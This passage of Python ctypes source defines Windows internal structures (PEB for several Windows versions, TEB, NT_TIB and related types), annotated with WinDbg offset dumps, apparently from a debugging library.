# +0x020 ProcessParameters : Ptr64 _RTL_USER_PROCESS_PARAMETERS
# +0x028 SubSystemData : Ptr64 Void
# +0x030 ProcessHeap : Ptr64 Void
# +0x038 FastPebLock : Ptr64 _RTL_CRITICAL_SECTION
# +0x040 AtlThunkSListPtr : Ptr64 Void
# +0x048 IFEOKey : Ptr64 Void
# +0x050 CrossProcessFlags : Uint4B
# +0x050 ProcessInJob : Pos 0, 1 Bit
# +0x050 ProcessInitializing : Pos 1, 1 Bit
# +0x050 ProcessUsingVEH : Pos 2, 1 Bit
# +0x050 ProcessUsingVCH : Pos 3, 1 Bit
# +0x050 ProcessUsingFTH : Pos 4, 1 Bit
# +0x050 ReservedBits0 : Pos 5, 27 Bits
# +0x058 KernelCallbackTable : Ptr64 Void
# +0x058 UserSharedInfoPtr : Ptr64 Void
# +0x060 SystemReserved : [1] Uint4B
# +0x064 AtlThunkSListPtr32 : Uint4B
# +0x068 ApiSetMap : Ptr64 Void
# +0x070 TlsExpansionCounter : Uint4B
# +0x078 TlsBitmap : Ptr64 Void
# +0x080 TlsBitmapBits : [2] Uint4B
# +0x088 ReadOnlySharedMemoryBase : Ptr64 Void
# +0x090 HotpatchInformation : Ptr64 Void
# +0x098 ReadOnlyStaticServerData : Ptr64 Ptr64 Void
# +0x0a0 AnsiCodePageData : Ptr64 Void
# +0x0a8 OemCodePageData : Ptr64 Void
# +0x0b0 UnicodeCaseTableData : Ptr64 Void
# +0x0b8 NumberOfProcessors : Uint4B
# +0x0bc NtGlobalFlag : Uint4B
# +0x0c0 CriticalSectionTimeout : _LARGE_INTEGER
# +0x0c8 HeapSegmentReserve : Uint8B
# +0x0d0 HeapSegmentCommit : Uint8B
# +0x0d8 HeapDeCommitTotalFreeThreshold : Uint8B
# +0x0e0 HeapDeCommitFreeBlockThreshold : Uint8B
# +0x0e8 NumberOfHeaps : Uint4B
# +0x0ec MaximumNumberOfHeaps : Uint4B
# +0x0f0 ProcessHeaps : Ptr64 Ptr64 Void
# +0x0f8 GdiSharedHandleTable : Ptr64 Void
# +0x100 ProcessStarterHelper : Ptr64 Void
# +0x108 GdiDCAttributeList : Uint4B
# +0x110 LoaderLock : Ptr64 _RTL_CRITICAL_SECTION
# +0x118 OSMajorVersion : Uint4B
# +0x11c OSMinorVersion : Uint4B
# +0x120 OSBuildNumber : Uint2B
# +0x122 OSCSDVersion : Uint2B
# +0x124 OSPlatformId : Uint4B
# +0x128 ImageSubsystem : Uint4B
# +0x12c ImageSubsystemMajorVersion : Uint4B
# +0x130 ImageSubsystemMinorVersion : Uint4B
# +0x138 ActiveProcessAffinityMask : Uint8B
# +0x140 GdiHandleBuffer : [60] Uint4B
# +0x230 PostProcessInitRoutine : Ptr64 void
# +0x238 TlsExpansionBitmap : Ptr64 Void
# +0x240 TlsExpansionBitmapBits : [32] Uint4B
# +0x2c0 SessionId : Uint4B
# +0x2c8 AppCompatFlags : _ULARGE_INTEGER
# +0x2d0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x2d8 pShimData : Ptr64 Void
# +0x2e0 AppCompatInfo : Ptr64 Void
# +0x2e8 CSDVersion : _UNICODE_STRING
# +0x2f8 ActivationContextData : Ptr64 _ACTIVATION_CONTEXT_DATA
# +0x300 ProcessAssemblyStorageMap : Ptr64 _ASSEMBLY_STORAGE_MAP
# +0x308 SystemDefaultActivationContextData : Ptr64 _ACTIVATION_CONTEXT_DATA
# +0x310 SystemAssemblyStorageMap : Ptr64 _ASSEMBLY_STORAGE_MAP
# +0x318 MinimumStackCommit : Uint8B
# +0x320 FlsCallback : Ptr64 _FLS_CALLBACK_INFO
# +0x328 FlsListHead : _LIST_ENTRY
# +0x338 FlsBitmap : Ptr64 Void
# +0x340 FlsBitmapBits : [4] Uint4B
# +0x350 FlsHighIndex : Uint4B
# +0x358 WerRegistrationData : Ptr64 Void
# +0x360 WerShipAssertPtr : Ptr64 Void
# +0x368 pContextData : Ptr64 Void
# +0x370 pImageHeaderHash : Ptr64 Void
# +0x378 TracingFlags : Uint4B
# +0x378 HeapTracingEnabled : Pos 0, 1 Bit
# +0x378 CritSecTracingEnabled : Pos 1, 1 Bit
# +0x378 SpareTracingBits : Pos 2, 30 Bits
class _PEB_2008_R2_64(Structure):
_pack_ = 8
_fields_ = [
("InheritedAddressSpace", BOOLEAN),
("ReadImageFileExecOptions", UCHAR),
("BeingDebugged", BOOLEAN),
("BitField", UCHAR),
("Mutant", HANDLE),
("ImageBaseAddress", PVOID),
("Ldr", PVOID), # PPEB_LDR_DATA
("ProcessParameters", PVOID), # PRTL_USER_PROCESS_PARAMETERS
("SubSystemData", PVOID),
("ProcessHeap", PVOID),
("FastPebLock", PVOID), # PRTL_CRITICAL_SECTION
("AtlThunkSListPtr", PVOID),
("IFEOKey", PVOID),
("CrossProcessFlags", DWORD),
("KernelCallbackTable", PVOID),
("SystemReserved", DWORD),
("AtlThunkSListPtr32", DWORD),
("ApiSetMap", PVOID),
("TlsExpansionCounter", DWORD),
("TlsBitmap", PVOID),
("TlsBitmapBits", DWORD * 2),
("ReadOnlySharedMemoryBase", PVOID),
("HotpatchInformation", PVOID),
("ReadOnlyStaticServerData", PVOID), # Ptr32 Ptr32 Void
("AnsiCodePageData", PVOID),
("OemCodePageData", PVOID),
("UnicodeCaseTableData", PVOID),
("NumberOfProcessors", DWORD),
("NtGlobalFlag", DWORD),
("CriticalSectionTimeout", LONGLONG), # LARGE_INTEGER
("HeapSegmentReserve", QWORD),
("HeapSegmentCommit", QWORD),
("HeapDeCommitTotalFreeThreshold", QWORD),
("HeapDeCommitFreeBlockThreshold", QWORD),
("NumberOfHeaps", DWORD),
("MaximumNumberOfHeaps", DWORD),
("ProcessHeaps", PVOID), # Ptr64 Ptr64 Void
("GdiSharedHandleTable", PVOID),
("ProcessStarterHelper", PVOID),
("GdiDCAttributeList", DWORD),
("LoaderLock", PVOID), # PRTL_CRITICAL_SECTION
("OSMajorVersion", DWORD),
("OSMinorVersion", DWORD),
("OSBuildNumber", WORD),
("OSCSDVersion", WORD),
("OSPlatformId", DWORD),
("ImageSubsystem", DWORD),
("ImageSubsystemMajorVersion", DWORD),
("ImageSubsystemMinorVersion", DWORD),
("ActiveProcessAffinityMask", QWORD),
("GdiHandleBuffer", DWORD * 60),
("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
("TlsExpansionBitmap", PVOID),
("TlsExpansionBitmapBits", DWORD * 32),
("SessionId", DWORD),
("AppCompatFlags", ULONGLONG), # ULARGE_INTEGER
("AppCompatFlagsUser", ULONGLONG), # ULARGE_INTEGER
("pShimData", PVOID),
("AppCompatInfo", PVOID),
("CSDVersion", UNICODE_STRING),
("ActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("ProcessAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("SystemDefaultActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("SystemAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("MinimumStackCommit", QWORD),
("FlsCallback", PVOID), # PFLS_CALLBACK_INFO
("FlsListHead", LIST_ENTRY),
("FlsBitmap", PVOID),
("FlsBitmapBits", DWORD * 4),
("FlsHighIndex", DWORD),
("WerRegistrationData", PVOID),
("WerShipAssertPtr", PVOID),
("pContextData", PVOID),
("pImageHeaderHash", PVOID),
("TracingFlags", DWORD),
]
def __get_UserSharedInfoPtr(self):
return self.KernelCallbackTable
def __set_UserSharedInfoPtr(self, value):
self.KernelCallbackTable = value
UserSharedInfoPtr = property(__get_UserSharedInfoPtr, __set_UserSharedInfoPtr)
_PEB_Vista = _PEB_2008
_PEB_Vista_64 = _PEB_2008_64
_PEB_W7 = _PEB_2008_R2
_PEB_W7_64 = _PEB_2008_R2_64
# +0x000 InheritedAddressSpace : UChar
# +0x001 ReadImageFileExecOptions : UChar
# +0x002 BeingDebugged : UChar
# +0x003 BitField : UChar
# +0x003 ImageUsesLargePages : Pos 0, 1 Bit
# +0x003 IsProtectedProcess : Pos 1, 1 Bit
# +0x003 IsLegacyProcess : Pos 2, 1 Bit
# +0x003 IsImageDynamicallyRelocated : Pos 3, 1 Bit
# +0x003 SkipPatchingUser32Forwarders : Pos 4, 1 Bit
# +0x003 SpareBits : Pos 5, 3 Bits
# +0x004 Mutant : Ptr32 Void
# +0x008 ImageBaseAddress : Ptr32 Void
# +0x00c Ldr : Ptr32 _PEB_LDR_DATA
# +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
# +0x014 SubSystemData : Ptr32 Void
# +0x018 ProcessHeap : Ptr32 Void
# +0x01c FastPebLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x020 AtlThunkSListPtr : Ptr32 Void
# +0x024 IFEOKey : Ptr32 Void
# +0x028 CrossProcessFlags : Uint4B
# +0x028 ProcessInJob : Pos 0, 1 Bit
# +0x028 ProcessInitializing : Pos 1, 1 Bit
# +0x028 ProcessUsingVEH : Pos 2, 1 Bit
# +0x028 ProcessUsingVCH : Pos 3, 1 Bit
# +0x028 ProcessUsingFTH : Pos 4, 1 Bit
# +0x028 ReservedBits0 : Pos 5, 27 Bits
# +0x02c KernelCallbackTable : Ptr32 Void
# +0x02c UserSharedInfoPtr : Ptr32 Void
# +0x030 SystemReserved : [1] Uint4B
# +0x034 TracingFlags : Uint4B
# +0x034 HeapTracingEnabled : Pos 0, 1 Bit
# +0x034 CritSecTracingEnabled : Pos 1, 1 Bit
# +0x034 SpareTracingBits : Pos 2, 30 Bits
# +0x038 ApiSetMap : Ptr32 Void
# +0x03c TlsExpansionCounter : Uint4B
# +0x040 TlsBitmap : Ptr32 Void
# +0x044 TlsBitmapBits : [2] Uint4B
# +0x04c ReadOnlySharedMemoryBase : Ptr32 Void
# +0x050 HotpatchInformation : Ptr32 Void
# +0x054 ReadOnlyStaticServerData : Ptr32 Ptr32 Void
# +0x058 AnsiCodePageData : Ptr32 Void
# +0x05c OemCodePageData : Ptr32 Void
# +0x060 UnicodeCaseTableData : Ptr32 Void
# +0x064 NumberOfProcessors : Uint4B
# +0x068 NtGlobalFlag : Uint4B
# +0x070 CriticalSectionTimeout : _LARGE_INTEGER
# +0x078 HeapSegmentReserve : Uint4B
# +0x07c HeapSegmentCommit : Uint4B
# +0x080 HeapDeCommitTotalFreeThreshold : Uint4B
# +0x084 HeapDeCommitFreeBlockThreshold : Uint4B
# +0x088 NumberOfHeaps : Uint4B
# +0x08c MaximumNumberOfHeaps : Uint4B
# +0x090 ProcessHeaps : Ptr32 Ptr32 Void
# +0x094 GdiSharedHandleTable : Ptr32 Void
# +0x098 ProcessStarterHelper : Ptr32 Void
# +0x09c GdiDCAttributeList : Uint4B
# +0x0a0 LoaderLock : Ptr32 _RTL_CRITICAL_SECTION
# +0x0a4 OSMajorVersion : Uint4B
# +0x0a8 OSMinorVersion : Uint4B
# +0x0ac OSBuildNumber : Uint2B
# +0x0ae OSCSDVersion : Uint2B
# +0x0b0 OSPlatformId : Uint4B
# +0x0b4 ImageSubsystem : Uint4B
# +0x0b8 ImageSubsystemMajorVersion : Uint4B
# +0x0bc ImageSubsystemMinorVersion : Uint4B
# +0x0c0 ActiveProcessAffinityMask : Uint4B
# +0x0c4 GdiHandleBuffer : [34] Uint4B
# +0x14c PostProcessInitRoutine : Ptr32 void
# +0x150 TlsExpansionBitmap : Ptr32 Void
# +0x154 TlsExpansionBitmapBits : [32] Uint4B
# +0x1d4 SessionId : Uint4B
# +0x1d8 AppCompatFlags : _ULARGE_INTEGER
# +0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER
# +0x1e8 pShimData : Ptr32 Void
# +0x1ec AppCompatInfo : Ptr32 Void
# +0x1f0 CSDVersion : _UNICODE_STRING
# +0x1f8 ActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x1fc ProcessAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x200 SystemDefaultActivationContextData : Ptr32 _ACTIVATION_CONTEXT_DATA
# +0x204 SystemAssemblyStorageMap : Ptr32 _ASSEMBLY_STORAGE_MAP
# +0x208 MinimumStackCommit : Uint4B
# +0x20c FlsCallback : Ptr32 _FLS_CALLBACK_INFO
# +0x210 FlsListHead : _LIST_ENTRY
# +0x218 FlsBitmap : Ptr32 Void
# +0x21c FlsBitmapBits : [4] Uint4B
# +0x22c FlsHighIndex : Uint4B
# +0x230 WerRegistrationData : Ptr32 Void
# +0x234 WerShipAssertPtr : Ptr32 Void
# +0x238 pContextData : Ptr32 Void
# +0x23c pImageHeaderHash : Ptr32 Void
class _PEB_W7_Beta(Structure):
"""
This definition of the PEB structure is only valid for the beta versions
of Windows 7. For the final version of Windows 7 use L{_PEB_W7} instead.
This structure is not chosen automatically.
"""
_pack_ = 8
_fields_ = [
("InheritedAddressSpace", BOOLEAN),
("ReadImageFileExecOptions", UCHAR),
("BeingDebugged", BOOLEAN),
("BitField", UCHAR),
("Mutant", HANDLE),
("ImageBaseAddress", PVOID),
("Ldr", PVOID), # PPEB_LDR_DATA
("ProcessParameters", PVOID), # PRTL_USER_PROCESS_PARAMETERS
("SubSystemData", PVOID),
("ProcessHeap", PVOID),
("FastPebLock", PVOID), # PRTL_CRITICAL_SECTION
("AtlThunkSListPtr", PVOID),
("IFEOKey", PVOID),
("CrossProcessFlags", DWORD),
("KernelCallbackTable", PVOID),
("SystemReserved", DWORD),
("TracingFlags", DWORD),
("ApiSetMap", PVOID),
("TlsExpansionCounter", DWORD),
("TlsBitmap", PVOID),
("TlsBitmapBits", DWORD * 2),
("ReadOnlySharedMemoryBase", PVOID),
("HotpatchInformation", PVOID),
("ReadOnlyStaticServerData", PVOID), # Ptr32 Ptr32 Void
("AnsiCodePageData", PVOID),
("OemCodePageData", PVOID),
("UnicodeCaseTableData", PVOID),
("NumberOfProcessors", DWORD),
("NtGlobalFlag", DWORD),
("CriticalSectionTimeout", LONGLONG), # LARGE_INTEGER
("HeapSegmentReserve", DWORD),
("HeapSegmentCommit", DWORD),
("HeapDeCommitTotalFreeThreshold", DWORD),
("HeapDeCommitFreeBlockThreshold", DWORD),
("NumberOfHeaps", DWORD),
("MaximumNumberOfHeaps", DWORD),
("ProcessHeaps", PVOID), # Ptr32 Ptr32 Void
("GdiSharedHandleTable", PVOID),
("ProcessStarterHelper", PVOID),
("GdiDCAttributeList", DWORD),
("LoaderLock", PVOID), # PRTL_CRITICAL_SECTION
("OSMajorVersion", DWORD),
("OSMinorVersion", DWORD),
("OSBuildNumber", WORD),
("OSCSDVersion", WORD),
("OSPlatformId", DWORD),
("ImageSubsystem", DWORD),
("ImageSubsystemMajorVersion", DWORD),
("ImageSubsystemMinorVersion", DWORD),
("ActiveProcessAffinityMask", DWORD),
("GdiHandleBuffer", DWORD * 34),
("PostProcessInitRoutine", PPS_POST_PROCESS_INIT_ROUTINE),
("TlsExpansionBitmap", PVOID),
("TlsExpansionBitmapBits", DWORD * 32),
("SessionId", DWORD),
("AppCompatFlags", ULONGLONG), # ULARGE_INTEGER
("AppCompatFlagsUser", ULONGLONG), # ULARGE_INTEGER
("pShimData", PVOID),
("AppCompatInfo", PVOID),
("CSDVersion", UNICODE_STRING),
("ActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("ProcessAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("SystemDefaultActivationContextData", PVOID), # ACTIVATION_CONTEXT_DATA
("SystemAssemblyStorageMap", PVOID), # ASSEMBLY_STORAGE_MAP
("MinimumStackCommit", DWORD),
("FlsCallback", PVOID), # PFLS_CALLBACK_INFO
("FlsListHead", LIST_ENTRY),
("FlsBitmap", PVOID),
("FlsBitmapBits", DWORD * 4),
("FlsHighIndex", DWORD),
("WerRegistrationData", PVOID),
("WerShipAssertPtr", PVOID),
("pContextData", PVOID),
("pImageHeaderHash", PVOID),
]
def __get_UserSharedInfoPtr(self):
return self.KernelCallbackTable
def __set_UserSharedInfoPtr(self, value):
self.KernelCallbackTable = value
UserSharedInfoPtr = property(__get_UserSharedInfoPtr, __set_UserSharedInfoPtr)
# Use the correct PEB structure definition.
# Defaults to the latest Windows version.
class PEB(Structure):
_pack_ = 8
if os == 'Windows NT':
_pack_ = _PEB_NT._pack_
_fields_ = _PEB_NT._fields_
elif os == 'Windows 2000':
_pack_ = _PEB_2000._pack_
_fields_ = _PEB_2000._fields_
elif os == 'Windows XP':
_fields_ = _PEB_XP._fields_
elif os == 'Windows XP (64 bits)':
_fields_ = _PEB_XP_64._fields_
elif os == 'Windows 2003':
_fields_ = _PEB_2003._fields_
elif os == 'Windows 2003 (64 bits)':
_fields_ = _PEB_2003_64._fields_
elif os == 'Windows 2003 R2':
_fields_ = _PEB_2003_R2._fields_
elif os == 'Windows 2003 R2 (64 bits)':
_fields_ = _PEB_2003_R2_64._fields_
elif os == 'Windows 2008':
_fields_ = _PEB_2008._fields_
elif os == 'Windows 2008 (64 bits)':
_fields_ = _PEB_2008_64._fields_
elif os == 'Windows 2008 R2':
_fields_ = _PEB_2008_R2._fields_
elif os == 'Windows 2008 R2 (64 bits)':
_fields_ = _PEB_2008_R2_64._fields_
elif os == 'Windows Vista':
_fields_ = _PEB_Vista._fields_
elif os == 'Windows Vista (64 bits)':
_fields_ = _PEB_Vista_64._fields_
elif os == 'Windows 7':
_fields_ = _PEB_W7._fields_
elif os == 'Windows 7 (64 bits)':
_fields_ = _PEB_W7_64._fields_
elif sizeof(SIZE_T) == sizeof(DWORD):
_fields_ = _PEB_W7._fields_
else:
_fields_ = _PEB_W7_64._fields_
PPEB = POINTER(PEB)
# PEB structure for WOW64 processes.
class PEB_32(Structure):
_pack_ = 8
if os == 'Windows NT':
_pack_ = _PEB_NT._pack_
_fields_ = _PEB_NT._fields_
elif os == 'Windows 2000':
_pack_ = _PEB_2000._pack_
_fields_ = _PEB_2000._fields_
elif os.startswith('Windows XP'):
_fields_ = _PEB_XP._fields_
elif os.startswith('Windows 2003 R2'):
_fields_ = _PEB_2003_R2._fields_
elif os.startswith('Windows 2003'):
_fields_ = _PEB_2003._fields_
elif os.startswith('Windows 2008 R2'):
_fields_ = _PEB_2008_R2._fields_
elif os.startswith('Windows 2008'):
_fields_ = _PEB_2008._fields_
elif os.startswith('Windows Vista'):
_fields_ = _PEB_Vista._fields_
else: #if os.startswith('Windows 7'):
_fields_ = _PEB_W7._fields_
# from https://vmexplorer.svn.codeplex.com/svn/VMExplorer/src/Win32/Threads.cs
#
# [StructLayout (LayoutKind.Sequential, Size = 0x0C)]
# public struct Wx86ThreadState
# {
# public IntPtr CallBx86Eip; // Ptr32 to Uint4B
# public IntPtr DeallocationCpu; // Ptr32 to Void
# public Byte UseKnownWx86Dll; // UChar
# public Byte OleStubInvoked; // Char
# };
class Wx86ThreadState(Structure):
_fields_ = [
("CallBx86Eip", PVOID),
("DeallocationCpu", PVOID),
("UseKnownWx86Dll", UCHAR),
("OleStubInvoked", CHAR),
]
# ntdll!_RTL_ACTIVATION_CONTEXT_STACK_FRAME
# +0x000 Previous : Ptr64 _RTL_ACTIVATION_CONTEXT_STACK_FRAME
# +0x008 ActivationContext : Ptr64 _ACTIVATION_CONTEXT
# +0x010 Flags : Uint4B
class RTL_ACTIVATION_CONTEXT_STACK_FRAME(Structure):
_fields_ = [
("Previous", PVOID),
("ActivationContext", PVOID),
("Flags", DWORD),
]
# ntdll!_ACTIVATION_CONTEXT_STACK
# +0x000 ActiveFrame : Ptr64 _RTL_ACTIVATION_CONTEXT_STACK_FRAME
# +0x008 FrameListCache : _LIST_ENTRY
# +0x018 Flags : Uint4B
# +0x01c NextCookieSequenceNumber : Uint4B
# +0x020 StackId : Uint4B
class ACTIVATION_CONTEXT_STACK(Structure):
_fields_ = [
("ActiveFrame", PVOID),
("FrameListCache", LIST_ENTRY),
("Flags", DWORD),
("NextCookieSequenceNumber", DWORD),
("StackId", DWORD),
]
# typedef struct _PROCESSOR_NUMBER {
# WORD Group;
# BYTE Number;
# BYTE Reserved;
# }PROCESSOR_NUMBER, *PPROCESSOR_NUMBER;
class PROCESSOR_NUMBER(Structure):
_fields_ = [
("Group", WORD),
("Number", BYTE),
("Reserved", BYTE),
]
# from http://www.nirsoft.net/kernel_struct/vista/NT_TIB.html
#
# typedef struct _NT_TIB
# {
# PEXCEPTION_REGISTRATION_RECORD ExceptionList;
# PVOID StackBase;
# PVOID StackLimit;
# PVOID SubSystemTib;
# union
# {
# PVOID FiberData;
# ULONG Version;
# };
# PVOID ArbitraryUserPointer;
# PNT_TIB Self;
# } NT_TIB, *PNT_TIB;
class _NT_TIB_UNION(Union):
_fields_ = [
("FiberData", PVOID),
("Version", ULONG),
]
class NT_TIB(Structure):
_fields_ = [
("ExceptionList", PVOID), # PEXCEPTION_REGISTRATION_RECORD
("StackBase", PVOID),
("StackLimit", PVOID),
("SubSystemTib", PVOID),
("u", _NT_TIB_UNION),
("ArbitraryUserPointer", PVOID),
("Self", PVOID), # PNTTIB
]
def __get_FiberData(self):
return self.u.FiberData
def __set_FiberData(self, value):
self.u.FiberData = value
FiberData = property(__get_FiberData, __set_FiberData)
def __get_Version(self):
return self.u.Version
def __set_Version(self, value):
self.u.Version = value
Version = property(__get_Version, __set_Version)
PNTTIB = POINTER(NT_TIB)
# From http://www.nirsoft.net/kernel_struct/vista/EXCEPTION_REGISTRATION_RECORD.html
#
# typedef struct _EXCEPTION_REGISTRATION_RECORD
# {
# PEXCEPTION_REGISTRATION_RECORD Next;
# PEXCEPTION_DISPOSITION Handler;
# } EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;
class EXCEPTION_REGISTRATION_RECORD(Structure):
pass
EXCEPTION_DISPOSITION = DWORD
##PEXCEPTION_DISPOSITION = POINTER(EXCEPTION_DISPOSITION)
##PEXCEPTION_REGISTRATION_RECORD = POINTER(EXCEPTION_REGISTRATION_RECORD)
PEXCEPTION_DISPOSITION = PVOID
PEXCEPTION_REGISTRATION_RECORD = PVOID
EXCEPTION_REGISTRATION_RECORD._fields_ = [
("Next", PEXCEPTION_REGISTRATION_RECORD),
("Handler", PEXCEPTION_DISPOSITION),
]
##PPEB = POINTER(PEB)
PPEB = PVOID
# From http://www.nirsoft.net/kernel_struct/vista/GDI_TEB_BATCH.html
#
# typedef struct _GDI_TEB_BATCH
# {
# ULONG Offset;
# ULONG HDC;
# ULONG Buffer[310];
# } GDI_TEB_BATCH, *PGDI_TEB_BATCH;
class GDI_TEB_BATCH(Structure):
_fields_ = [
("Offset", ULONG),
("HDC", ULONG),
("Buffer", ULONG * 310),
]
# ntdll!_TEB_ACTIVE_FRAME_CONTEXT
# +0x000 Flags : Uint4B
# +0x008 FrameName : Ptr64 Char
class TEB_ACTIVE_FRAME_CONTEXT(Structure):
_fields_ = [
("Flags", DWORD),
("FrameName", LPVOID), # LPCHAR
]
PTEB_ACTIVE_FRAME_CONTEXT = POINTER(TEB_ACTIVE_FRAME_CONTEXT)
# ntdll!_TEB_ACTIVE_FRAME
# +0x000 Flags : Uint4B
# +0x008 Previous : Ptr64 _TEB_ACTIVE_FRAME
# +0x010 Context : Ptr64 _TEB_ACTIVE_FRAME_CONTEXT
class TEB_ACTIVE_FRAME(Structure):
_fields_ = [
("Flags", DWORD),
("Previous", LPVOID), # PTEB_ACTIVE_FRAME
("Context", LPVOID), # PTEB_ACTIVE_FRAME_CONTEXT
]
PTEB_ACTIVE_FRAME = POINTER(TEB_ACTIVE_FRAME)
# SameTebFlags
DbgSafeThunkCall = 1 << 0
DbgInDebugPrint = 1 << 1
DbgHasFiberData = 1 << 2
DbgSkipThreadAttach = 1 << 3
DbgWerInShipAssertCode = 1 << 4
DbgRanProcessInit = 1 << 5
DbgClonedThread = 1 << 6
DbgSuppressDebugMsg = 1 << 7
RtlDisableUserStackWalk = 1 << 8
RtlExceptionAttached = 1 << 9
RtlInitialThread = 1 << 10
# XXX This is quite wrong :P
class _TEB_NT(Structure):
_pack_ = 4
_fields_ = [
("NtTib", NT_TIB),
("EnvironmentPointer", PVOID),
("ClientId", CLIENT_ID),
("ActiveRpcHandle", HANDLE),
("ThreadLocalStoragePointer", PVOID),
("ProcessEnvironmentBlock", PPEB),
("LastErrorValue", ULONG),
("CountOfOwnedCriticalSections", ULONG),
("CsrClientThread", PVOID),
("Win32ThreadInfo", PVOID),
("User32Reserved", ULONG * 26),
("UserReserved", ULONG * 5),
("WOW32Reserved", PVOID), # ptr to wow64cpu!X86SwitchTo64BitMode
("CurrentLocale", ULONG),
("FpSoftwareStatusRegister", ULONG),
("SystemReserved1", PVOID * 54),
("Spare1", PVOID),
("ExceptionCode", ULONG),
("ActivationContextStackPointer", PVOID), # PACTIVATION_CONTEXT_STACK
("SpareBytes1", ULONG * 36),
("TxFsContext", ULONG),
("GdiTebBatch", GDI_TEB_BATCH),
("RealClientId", CLIENT_ID),
("GdiCachedProcessHandle", PVOID),
("GdiClientPID", ULONG),
("GdiClientTID", ULONG),
("GdiThreadLocalInfo", PVOID),
("Win32ClientInfo", PVOID * 62),
("glDispatchTable", PVOID * 233),
("glReserved1", ULONG * 29),
("glReserved2", PVOID),
("glSectionInfo", PVOID),
("glSection", PVOID),
("glTable", PVOID),
("glCurrentRC", PVOID),
("glContext", PVOID),
("LastStatusValue", NTSTATUS),
("StaticUnicodeString", UNICODE_STRING),
("StaticUnicodeBuffer", WCHAR * 261),
("DeallocationStack", PVOID),
("TlsSlots", PVOID * 64),
("TlsLinks", LIST_ENTRY),
("Vdm", PVOID),
("ReservedForNtRpc", PVOID),
("DbgSsReserved", PVOID * 2),
("HardErrorDisabled", ULONG),
("Instrumentation", PVOID * 9),
("ActivityId", GUID),
("SubProcessTag", PVOID),
("EtwLocalData", PVOID),
("EtwTraceData", PVOID),
("WinSockData", PVOID),
("GdiBatchCount", ULONG),
("SpareBool0", BOOLEAN),
("SpareBool1", BOOLEAN),
("SpareBool2", BOOLEAN),
("IdealProcessor", UCHAR),
("GuaranteedStackBytes", ULONG),
("ReservedForPerf", PVOID),
("ReservedForOle", PVOID),
("WaitingOnLoaderLock", ULONG),
("StackCommit", PVOID),
("StackCommitMax", PVOID),
("StackReserved", PVOID),
]
# not really, but "dt _TEB" in w2k isn't working for me :(
_TEB_2000 = _TEB_NT
# +0x000 NtTib : _NT_TIB
# +0x01c EnvironmentPointer : Ptr32 Void
# +0x020 ClientId : _CLIENT_ID
# +0x028 ActiveRpcHandle : Ptr32 Void
# +0x02c ThreadLocalStoragePointer : Ptr32 Void
# +0x030 ProcessEnvironmentBlock : Ptr32 _PEB
# +0x034 LastErrorValue : Uint4B
# +0x038 CountOfOwnedCriticalSections : Uint4B
# +0x03c CsrClientThread : Ptr32 Void
# +0x040 Win32ThreadInfo : Ptr32 Void
# +0x044 User32Reserved : [26] Uint4B
# +0x0ac UserReserved : [5] Uint4B
# +0x0c0 WOW32Reserved : Ptr32 Void
# +0x0c4 CurrentLocale : Uint4B
# +0x0c8 FpSoftwareStatusRegister : Uint4B
# +0x0cc SystemReserved1 : [54] Ptr32 Void
# +0x1a4 ExceptionCode : Int4B
# +0x1a8 ActivationContextStack : _ACTIVATION_CONTEXT_STACK
# +0x1bc SpareBytes1 : [24] UChar
# +0x1d4 GdiTebBatch : _GDI_TEB_BATCH
# +0x6b4 RealClientId : _CLIENT_ID
# +0x6bc GdiCachedProcessHandle : Ptr32 Void
# +0x6c0 GdiClientPID : Uint4B
# +0x6c4 GdiClientTID : Uint4B
# +0x6c8 GdiThreadLocalInfo : Ptr32 Void
# +0x6cc Win32ClientInfo : [62] Uint4B
# +0x7c4 glDispatchTable : [233] Ptr32 Void
# +0xb68 glReserved1 : [29] Uint4B
# +0xbdc glReserved2 : Ptr32 Void
# +0xbe0 glSectionInfo : Ptr32 Void
# +0xbe4 glSection : Ptr32 Void
# +0xbe8 glTable : Ptr32 Void
# +0xbec glCurrentRC : Ptr32 Void
# +0xbf0 glContext : Ptr32 Void
# +0xbf4 LastStatusValue : Uint4B
# +0xbf8 StaticUnicodeString : _UNICODE_STRING
# +0xc00 StaticUnicodeBuffer : [261] Uint2B
# +0xe0c DeallocationStack : Ptr32 Void
# +0xe10 TlsSlots : [64] Ptr32 Void
# +0xf10 TlsLinks : _LIST_ENTRY
# +0xf18 Vdm : Ptr32 Void
# +0xf1c ReservedForNtRpc : Ptr32 Void
# +0xf20 DbgSsReserved : [2] Ptr32 Void
# +0xf28 HardErrorsAreDisabled : Uint4B
# +0xf2c Instrumentation : [16] Ptr32 Void
# +0xf6c WinSockData : Ptr32 Void
# +0xf70 GdiBatchCount : Uint4B
# +0xf74 InDbgPrint : UChar
# +0xf75 FreeStackOnTermination : UChar
# +0xf76 HasFiberData : UChar
# +0xf77 IdealProcessor : UChar
# +0xf78 Spare3 : Uint4B
# +0xf7c ReservedForPerf : Ptr32 Void
# +0xf80 ReservedForOle : Ptr32 Void
# +0xf84 WaitingOnLoaderLock : Uint4B
# +0xf88 Wx86Thread : _Wx86ThreadState
# +0xf94 TlsExpansionSlots : Ptr32 Ptr32 Void
# +0xf98 ImpersonationLocale : Uint4B
# +0xf9c IsImpersonating : Uint4B
# +0xfa0 NlsCache : Ptr32 Void
# +0xfa4 pShimData : Ptr32 Void
# +0xfa8 HeapVirtualAffinity : Uint4B
# +0xfac CurrentTransactionHandle : Ptr32 Void
# +0xfb0 ActiveFrame : Ptr32 _TEB_ACTIVE_FRAME
# +0xfb4 SafeThunkCall : UChar
# +0xfb5 BooleanSpare : [3] UChar
class _TEB_XP(Structure):
_pack_ = 8
_fields_ = [
("NtTib", NT_TIB),
("EnvironmentPointer", PVOID),
("ClientId", CLIENT_ID),
("ActiveRpcHandle", HANDLE),
("ThreadLocalStoragePointer", PVOID),
